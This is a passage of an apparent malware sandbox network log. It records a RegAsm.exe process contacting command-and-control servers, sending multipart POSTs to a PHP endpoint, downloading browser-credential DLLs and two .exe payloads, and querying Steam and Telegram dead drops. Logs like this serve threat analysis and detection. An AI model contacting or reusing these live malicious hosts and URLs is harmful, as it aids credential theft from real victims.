          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uwL8iNHItyOrbvAEcYYQi3JlweNWGH4CFqV55s%2B%2B89V3p%2Fuf8OldGlTYRp%2FCdsISFHHEEl4lF%2Ffit86fCJH9lj4WnwMerZH6h9lDdlWYxjwGHFs7iZ9xMGAMLsdJOU8ZqB0yIIo%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8cb396c5be64bedf-LHR
        • flag-us
          DNS
          129.205.67.172.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          129.205.67.172.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          bellykmrebk.site
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          bellykmrebk.site
          IN A
          Response
        • flag-us
          DNS
          agentyanlark.site
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          agentyanlark.site
          IN A
          Response
        • flag-us
          DNS
          writekdmsnu.site
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          writekdmsnu.site
          IN A
          Response
        • flag-us
          DNS
          delaylacedmn.site
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          delaylacedmn.site
          IN A
          Response
        • flag-us
          DNS
          steamcommunity.com
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          steamcommunity.com
          IN A
          Response
          steamcommunity.com
          IN A
          104.82.234.109
        • flag-gb
          GET
          https://steamcommunity.com/profiles/76561199724331900
          RegAsm.exe
          Remote address:
          104.82.234.109:443
          Request
          GET /profiles/76561199724331900 HTTP/1.1
          Connection: Keep-Alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Host: steamcommunity.com
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Content-Type: text/html; charset=UTF-8
          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
          Expires: Mon, 26 Jul 1997 05:00:00 GMT
          Cache-Control: no-cache
          Date: Mon, 30 Sep 2024 10:39:25 GMT
          Content-Length: 34734
          Connection: keep-alive
          Set-Cookie: sessionid=1588e264885d1e512a49d9d7; Path=/; Secure; SameSite=None
          Set-Cookie: steamCountry=GB%7Ce15d564837abb028acb4e114150d704d; Path=/; Secure; HttpOnly; SameSite=None
        • flag-us
          DNS
          chaptermusu.store
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          chaptermusu.store
          IN A
          Response
          chaptermusu.store
          IN A
          172.67.207.133
          chaptermusu.store
          IN A
          104.21.37.109
        • flag-us
          POST
          https://chaptermusu.store/api
          RegAsm.exe
          Remote address:
          172.67.207.133:443
          Request
          POST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: application/x-www-form-urlencoded
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 8
          Host: chaptermusu.store
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:26 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
          Set-Cookie: PHPSESSID=pj9vgi3aqbgf0t0rudptac908q; expires=Fri, 24 Jan 2025 04:26:05 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fNzAzxMryRpW%2BLsqBJCgJ2YcMLi%2F5KuuarxAO%2FXNZSLW3mIRH8rhkt%2Fwm87M%2BWDRPXfwCtJQH12C9%2BxL62gS0YE2ErfI6EmrOI5SCGHEHFo%2BdcID4AP3zTMA7I9u2wV8pxuNYQ%3D%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8cb396cdacc4d1f7-LHR
        • flag-us
          DNS
          169.1.21.104.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          169.1.21.104.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          109.234.82.104.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          109.234.82.104.in-addr.arpa
          IN PTR
          Response
          109.234.82.104.in-addr.arpa
          IN PTR
          a104-82-234-109.deploy.static.akamaitechnologies.com
        • flag-cz
          GET
          http://46.8.231.109/
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          GET / HTTP/1.1
          Host: 46.8.231.109
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:26 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Content-Length: 0
          Keep-Alive: timeout=5, max=100
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
        • flag-cz
          POST
          http://46.8.231.109/c4754d4f680ead72.php
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          POST /c4754d4f680ead72.php HTTP/1.1
          Content-Type: multipart/form-data; boundary=----CBGHCAKKFBGDHJJJKECF
          Host: 46.8.231.109
          Content-Length: 214
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:26 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Vary: Accept-Encoding
          Content-Length: 180
          Keep-Alive: timeout=5, max=99
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
        • flag-cz
          POST
          http://46.8.231.109/c4754d4f680ead72.php
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          POST /c4754d4f680ead72.php HTTP/1.1
          Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJ
          Host: 46.8.231.109
          Content-Length: 268
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:26 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Vary: Accept-Encoding
          Content-Length: 1520
          Keep-Alive: timeout=5, max=98
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
        • flag-cz
          POST
          http://46.8.231.109/c4754d4f680ead72.php
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          POST /c4754d4f680ead72.php HTTP/1.1
          Content-Type: multipart/form-data; boundary=----DHIEHIIEHIEHJKEBKEHJ
          Host: 46.8.231.109
          Content-Length: 267
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:26 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Vary: Accept-Encoding
          Content-Length: 7116
          Keep-Alive: timeout=5, max=97
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
        • flag-cz
          POST
          http://46.8.231.109/c4754d4f680ead72.php
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          POST /c4754d4f680ead72.php HTTP/1.1
          Content-Type: multipart/form-data; boundary=----BKFHCGIDBAAFHIDHDAAE
          Host: 46.8.231.109
          Content-Length: 268
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:26 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Vary: Accept-Encoding
          Content-Length: 108
          Keep-Alive: timeout=5, max=96
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
        • flag-cz
          POST
          http://46.8.231.109/c4754d4f680ead72.php
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          POST /c4754d4f680ead72.php HTTP/1.1
          Content-Type: multipart/form-data; boundary=----BFCFBKKKFHCFHJKFIIEH
          Host: 46.8.231.109
          Content-Length: 4739
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:27 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Content-Length: 0
          Keep-Alive: timeout=5, max=95
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
        • flag-cz
          GET
          http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dll
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1
          Host: 46.8.231.109
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:27 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT
          ETag: "10e436-5e7eeebed8d80"
          Accept-Ranges: bytes
          Content-Length: 1106998
          Content-Type: application/x-msdos-program
        • flag-cz
          POST
          http://46.8.231.109/c4754d4f680ead72.php
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          POST /c4754d4f680ead72.php HTTP/1.1
          Content-Type: multipart/form-data; boundary=----BGDBAKFCFHCGDGCBAAKF
          Host: 46.8.231.109
          Content-Length: 363
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:28 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Content-Length: 0
          Keep-Alive: timeout=5, max=93
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
        • flag-cz
          POST
          http://46.8.231.109/c4754d4f680ead72.php
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          POST /c4754d4f680ead72.php HTTP/1.1
          Content-Type: multipart/form-data; boundary=----EHIJJDGDHDGDAKFIECFI
          Host: 46.8.231.109
          Content-Length: 363
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:28 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Content-Length: 0
          Keep-Alive: timeout=5, max=92
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
        • flag-cz
          GET
          http://46.8.231.109/1309cdeb8f4c8736/freebl3.dll
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1
          Host: 46.8.231.109
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:28 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
          ETag: "a7550-5e7ebd4425100"
          Accept-Ranges: bytes
          Content-Length: 685392
          Content-Type: application/x-msdos-program
        • flag-cz
          GET
          http://46.8.231.109/1309cdeb8f4c8736/mozglue.dll
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1
          Host: 46.8.231.109
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:28 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
          ETag: "94750-5e7ebd4425100"
          Accept-Ranges: bytes
          Content-Length: 608080
          Content-Type: application/x-msdos-program
        • flag-cz
          GET
          http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1
          Host: 46.8.231.109
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:29 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
          ETag: "6dde8-5e7ebd4425100"
          Accept-Ranges: bytes
          Content-Length: 450024
          Content-Type: application/x-msdos-program
        • flag-cz
          GET
          http://46.8.231.109/1309cdeb8f4c8736/nss3.dll
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1
          Host: 46.8.231.109
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:29 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
          ETag: "1f3950-5e7ebd4425100"
          Accept-Ranges: bytes
          Content-Length: 2046288
          Content-Type: application/x-msdos-program
        • flag-cz
          GET
          http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1
          Host: 46.8.231.109
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:31 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
          ETag: "3ef50-5e7ebd4425100"
          Accept-Ranges: bytes
          Content-Length: 257872
          Content-Type: application/x-msdos-program
        • flag-cz
          GET
          http://46.8.231.109/1309cdeb8f4c8736/vcruntime140.dll
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1
          Host: 46.8.231.109
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:31 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
          ETag: "13bf0-5e7ebd4425100"
          Accept-Ranges: bytes
          Content-Length: 80880
          Content-Type: application/x-msdos-program
        • flag-cz
          POST
          http://46.8.231.109/c4754d4f680ead72.php
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          POST /c4754d4f680ead72.php HTTP/1.1
          Content-Type: multipart/form-data; boundary=----GHDAKKJJJKJKECBGCGDA
          Host: 46.8.231.109
          Content-Length: 947
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:31 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Content-Length: 0
          Keep-Alive: timeout=5, max=85
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
        • flag-cz
          POST
          http://46.8.231.109/c4754d4f680ead72.php
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          POST /c4754d4f680ead72.php HTTP/1.1
          Content-Type: multipart/form-data; boundary=----KEGCBFCBFBKFHIECAFCF
          Host: 46.8.231.109
          Content-Length: 267
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:31 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Vary: Accept-Encoding
          Content-Length: 2408
          Keep-Alive: timeout=5, max=84
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
        • flag-cz
          POST
          http://46.8.231.109/c4754d4f680ead72.php
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          POST /c4754d4f680ead72.php HTTP/1.1
          Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJ
          Host: 46.8.231.109
          Content-Length: 265
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:31 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Content-Length: 0
          Keep-Alive: timeout=5, max=83
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
        • flag-cz
          POST
          http://46.8.231.109/c4754d4f680ead72.php
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          POST /c4754d4f680ead72.php HTTP/1.1
          Content-Type: multipart/form-data; boundary=----HJKECAAAFHJECAAAEBFC
          Host: 46.8.231.109
          Content-Length: 363
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:31 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Content-Length: 0
          Keep-Alive: timeout=5, max=82
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
        • flag-cz
          POST
          http://46.8.231.109/c4754d4f680ead72.php
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          POST /c4754d4f680ead72.php HTTP/1.1
          Content-Type: multipart/form-data; boundary=----IDBKFHJEBAAEBGDGDBFB
          Host: 46.8.231.109
          Content-Length: 272
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:31 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Vary: Accept-Encoding
          Content-Length: 184
          Keep-Alive: timeout=5, max=81
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
        • flag-cz
          POST
          http://46.8.231.109/c4754d4f680ead72.php
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          POST /c4754d4f680ead72.php HTTP/1.1
          Content-Type: multipart/form-data; boundary=----JKKECBGIIIEBGCBGIDHD
          Host: 46.8.231.109
          Content-Length: 272
          Connection: Keep-Alive
          Cache-Control: no-cache
        • flag-us
          DNS
          cowod.hopto.org
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          cowod.hopto.org
          IN A
          Response
          cowod.hopto.org
          IN A
          45.132.206.251
        • flag-ru
          POST
          http://cowod.hopto.org/
          RegAsm.exe
          Remote address:
          45.132.206.251:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----HCAEBFBKKJDHIDHIDBAE
          Host: cowod.hopto.org
          Content-Length: 2709
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: openresty
          Date: Mon, 30 Sep 2024 10:39:27 GMT
          Content-Type: text/html; charset=UTF-8
          Content-Length: 0
          Connection: keep-alive
          X-Served-By: cowod.hopto.org
        • flag-nl
          GET
          https://t.me/jamsemlg
          RegAsm.exe
          Remote address:
          149.154.167.99:443
          Request
          GET /jamsemlg HTTP/1.1
          Host: t.me
          Connection: Keep-Alive
          Cache-Control: no-cache
          Cookie: stel_ssid=a24a0cfbc4f6be6b71_11082954543017583655
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0
          Date: Mon, 30 Sep 2024 10:39:27 GMT
          Content-Type: text/html; charset=utf-8
          Content-Length: 12382
          Connection: keep-alive
          Pragma: no-cache
          Cache-control: no-store
          X-Frame-Options: ALLOW-FROM https://web.telegram.org
          Content-Security-Policy: frame-ancestors https://web.telegram.org
          Strict-Transport-Security: max-age=35768000
        • flag-us
          DNS
          109.231.8.46.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          109.231.8.46.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          133.207.67.172.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          133.207.67.172.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          251.206.132.45.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          251.206.132.45.in-addr.arpa
          IN PTR
          Response
        • flag-nl
          GET
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          GET / HTTP/1.1
          Host: urusvisa.com
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:28 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-nl
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----AAKKFHCFIECAAAKEGCFI
          Host: urusvisa.com
          Content-Length: 256
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:28 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-nl
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----HJKECAAAFHJECAAAEBFC
          Host: urusvisa.com
          Content-Length: 331
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:29 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-nl
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----HCFBKKEBKEBGIDHIEHCF
          Host: urusvisa.com
          Content-Length: 331
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:29 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-nl
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----KEGCBFCBFBKFHIECAFCF
          Host: urusvisa.com
          Content-Length: 332
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:29 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-nl
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----JEGHCBAFBFHIIECBKFCG
          Host: urusvisa.com
          Content-Length: 4765
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:30 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-nl
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----FIEGCBKEGCFCBFIDBFII
          Host: urusvisa.com
          Content-Length: 437
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:31 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-us
          DNS
          22.249.124.192.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          22.249.124.192.in-addr.arpa
          IN PTR
          Response
          22.249.124.192.in-addr.arpa
          IN PTR
          cloudproxy10022.sucuri.net
        • flag-ch
          GET
          http://files.veritas.org.ng/ldms/66fa2afc5abea_vasd.exe
          RegAsm.exe
          Remote address:
          147.45.44.104:80
          Request
          GET /ldms/66fa2afc5abea_vasd.exe HTTP/1.1
          Host: files.veritas.org.ng
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:32 GMT
          Content-Type: application/octet-stream
          Content-Length: 414248
          Last-Modified: Mon, 30 Sep 2024 04:37:16 GMT
          Connection: keep-alive
          Keep-Alive: timeout=120
          ETag: "66fa2afc-65228"
          X-Content-Type-Options: nosniff
          Accept-Ranges: bytes
        • flag-ch
          GET
          http://files.veritas.org.ng/ldms/66fa2b049020f_ldnf.exe
          RegAsm.exe
          Remote address:
          147.45.44.104:80
          Request
          GET /ldms/66fa2b049020f_ldnf.exe HTTP/1.1
          Host: files.veritas.org.ng
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:32 GMT
          Content-Type: application/octet-stream
          Content-Length: 380456
          Last-Modified: Mon, 30 Sep 2024 04:37:24 GMT
          Connection: keep-alive
          Keep-Alive: timeout=120
          ETag: "66fa2b04-5ce28"
          X-Content-Type-Options: nosniff
          Accept-Ranges: bytes
        • flag-us
          POST
          https://possiwreeste.site/api
          RegAsm.exe
          Remote address:
          172.67.205.129:443
          Request
          POST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: application/x-www-form-urlencoded
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 8
          Host: possiwreeste.site
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:34 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
          Set-Cookie: PHPSESSID=p5sq49in5ofuraqkg9nfv9mrc2; expires=Fri, 24 Jan 2025 04:26:13 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qqqPdnfNvS88zpSJ5rHFGLdbNAXYdlNw2DJgAdbS%2FdqiCTTS3R2ak7W%2BZ%2FcJXynNZfi3e44ttNp61G99PXsBWpcZODeG%2FjqTfYnVM%2Fq%2BcLDfBrM4ttAo9li1FxWhBuysfozthg%3D%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8cb396fd9f74cd21-LHR
          alt-svc: h3=":443"; ma=86400
        • flag-us
          POST
          https://possiwreeste.site/api
          RegAsm.exe
          Remote address:
          172.67.205.129:443
          Request
          POST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: application/x-www-form-urlencoded
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 8
          Host: possiwreeste.site
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:34 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
          Set-Cookie: PHPSESSID=q2pcrrrhhceldpf7uedqgc5295; expires=Fri, 24 Jan 2025 04:26:13 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VNTmZhZhQKKhj%2F%2Fw9KZXul6adaZlBrAnFjRLiMvUTS3zI4DyBAsZkTIROynHDF6Rr%2BIVjf7KoNt9Ip5Vhw5fZdRjF7LOF7%2BcEgcFnngZC4JE%2FUK5ZHDUwYFNZlq17gDnr1XRXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8cb396ff9a8bcd21-LHR
          alt-svc: h3=":443"; ma=86400
        • flag-us
          DNS
          famikyjdiag.site
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          famikyjdiag.site
          IN A
          Response
        • flag-us
          DNS
          commandejorsk.site
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          commandejorsk.site
          IN A
          Response
        • flag-us
          POST
          https://underlinemdsj.site/api
          RegAsm.exe
          Remote address:
          104.21.1.169:443
          Request
          POST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: application/x-www-form-urlencoded
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 8
          Host: underlinemdsj.site
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:34 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
          Set-Cookie: PHPSESSID=takl526ts02jt1cadqp777bcmp; expires=Fri, 24 Jan 2025 04:26:13 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
          CF-Cache-Status: DYNAMIC
